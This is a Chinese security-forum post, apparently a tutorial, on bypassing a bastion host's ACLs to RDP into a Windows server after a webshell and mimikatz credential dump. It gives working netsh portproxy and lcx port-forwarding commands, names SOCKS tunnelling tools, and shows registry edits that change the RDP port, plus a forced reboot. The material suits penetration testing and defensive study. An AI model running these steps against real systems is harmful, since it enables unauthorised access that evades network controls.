安全矩阵

 找回密码
 立即注册
搜索
查看: 4433|回复: 0

如何绕过堡垒机远程登录

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-8-18 09:57:19 | 显示全部楼层 |阅读模式
原文链接:如何绕过堡垒机远程登录

假设一个场景:在Webshell中执行mimikatz获取到win管理员密码,并且本地查看端口3389是开放的,可是从当前跳板机无法远程到目标机器。因为某个特定需求,一定要远程登录到这台win服务器,这时该怎么办?
首先我们先分析一下这个场景,端口开放却无法连接,最有可能的情况,就是到达目标网段受到ACL策略限制,只允许通过特定网段登录,比如说堡垒机。大多数堡垒机部署时,为了不改变现有的网络拓扑结构,采用旁路部署的方案,通过ACL策略限制用户访问特定端口。
那么,我们就可以用另一种方式来描述这个问题:目标服务器远程端口受到ACL限制,但其他端口没有限制,那么,最简单的解决方式就可以通过端口转发来绕过。
1、使用netsh命令进行端口转发
Windows自带的netshnetsh实现端口转发,监听12345端口,转发到本地3389端口,可绕过访问策略限制。
  1. #A、3389端口转发到12345端口
  2. netsh interface portproxy add v4tov4 listenaddress=192.168.126.32 listenport=12345 connectaddress=192.168.126.32 connectport=3389

  3. #B、查看配置好的端口映射清单
  4. C:\Windows\system32>netsh interface portproxy show v4tov4

  5. 侦听 ipv4:                 连接到 ipv4:

  6. 地址            端口        地址            端口
  7. --------------- ----------  --------------- ----------
  8. 192.168.126.32  12345       192.168.126.32  3389
复制代码
这样一来,通过攻击机跳板机直接远程目标机器的12345端口,就可以实现远程登录。
2、LCX 端口转发
  1. 在目标机器上执行:lcx.exe -slave 公网ip 51 内网ip 3389
  2. 在公网的机器执行:Lcx.exe –listen 51 3340
复制代码

本地机器上连接 127.0.0.1:3340,即可连接上目标机器的3389。
3、内网穿透工具
SOCKS代理,如Ngrok、frp、EW、reGeorg、sSocks等
通过利用SOCKS协议,结合Proxifier使用,可实现mstsc登录目标主机。
4、修改Windows远程桌面端口
通过修改Windows默认远程桌面端口,从而绕过ACL策略访问限制。
修改注册表,命令如下:
  1. REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v "PortNumber" /t REG_DWORD /d 12345/f
  2. REG ADD "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 12345 /f
复制代码
强制重启目标服务器后,注册表生效。
  1. shutdown -r -t 0
复制代码
此时,就可以远程目标服务器的12345登录。




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-9-20 05:52 , Processed in 0.013121 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表